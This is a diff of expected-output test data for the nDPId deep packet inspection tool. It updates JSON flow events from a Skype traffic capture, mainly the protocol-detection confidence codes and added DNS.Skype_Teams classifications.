00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969685111,"flow_last_seen":1431969703010,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":486,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50072,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969685111,"flow_last_seen":1431969703010,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":486,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50072,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969719055,"flow_last_seen":1431969719110,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62454,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969719055,"flow_last_seen":1431969719110,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62454,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}} 00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969691076,"flow_last_seen":1431969709588,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":326,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50078,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969691076,"flow_last_seen":1431969709588,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":326,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50078,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969691076,"flow_last_seen":1431969708230,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":536,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":50080,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
@@ -1347,7 +1347,7 @@ 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969692087,"flow_last_seen":1431969710209,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":515,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":50081,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969770694,"flow_last_seen":1431969788429,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50137,"dst_port":31010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969770694,"flow_last_seen":1431969788429,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50137,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969683445,"flow_last_seen":1431969709776,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58368,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969683445,"flow_last_seen":1431969709776,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58368,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00605{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1431969771806,"flow_last_seen":1431969808841,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2577,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50139,"dst_port":31010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1431969771806,"flow_last_seen":1431969808841,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2577,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50139,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969699142,"flow_last_seen":1431969728419,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":684,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50091,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
@@ -1360,108 +1360,108 @@ 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969706277,"flow_last_seen":1431969723613,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":592,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":50101,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969691076,"flow_last_seen":1431969717999,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50079,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969691076,"flow_last_seen":1431969717999,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50079,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969720556,"flow_last_seen":1431969746803,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":56387,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969683445,"flow_last_seen":1431969709776,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54343,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969720556,"flow_last_seen":1431969746803,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":56387,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969683445,"flow_last_seen":1431969709776,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54343,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969675413,"flow_last_seen":1431969703766,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50059,"dst_port":40015,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969675413,"flow_last_seen":1431969703766,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50059,"dst_port":40015,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969673443,"flow_last_seen":1431969701528,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.47","src_port":50055,"dst_port":40030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969673443,"flow_last_seen":1431969701528,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.47","src_port":50055,"dst_port":40030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969677975,"flow_last_seen":1431969704363,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58458,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969677975,"flow_last_seen":1431969704363,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58458,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969695483,"flow_last_seen":1431969723584,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50086,"dst_port":40023,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969695483,"flow_last_seen":1431969723584,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50086,"dst_port":40023,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969704663,"flow_last_seen":1431969718237,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":50096,"dst_port":40027,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969704663,"flow_last_seen":1431969718237,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":50096,"dst_port":40027,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969642244,"flow_last_seen":1431969668794,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54396,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":56886,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969642244,"flow_last_seen":1431969668794,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54396,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":56886,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969725833,"flow_last_seen":1431969741920,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50132,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969725833,"flow_last_seen":1431969741920,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50132,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969727446,"flow_last_seen":1431969727738,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1524,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50133,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":387,"flow_first_seen":1431969642444,"flow_last_seen":1431969808620,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":172532,"flow_avg_l4_payload_len":445,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":50028,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431969713813,"flow_last_seen":1431969733946,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.185.207.12","src_port":13021,"dst_port":45493,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969759543,"flow_last_seen":1431969759588,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.253.48.245","src_port":123,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969642334,"flow_last_seen":1431969642400,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58681,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":387,"flow_first_seen":1431969642444,"flow_last_seen":1431969808620,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":172532,"flow_avg_l4_payload_len":445,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":50028,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": 
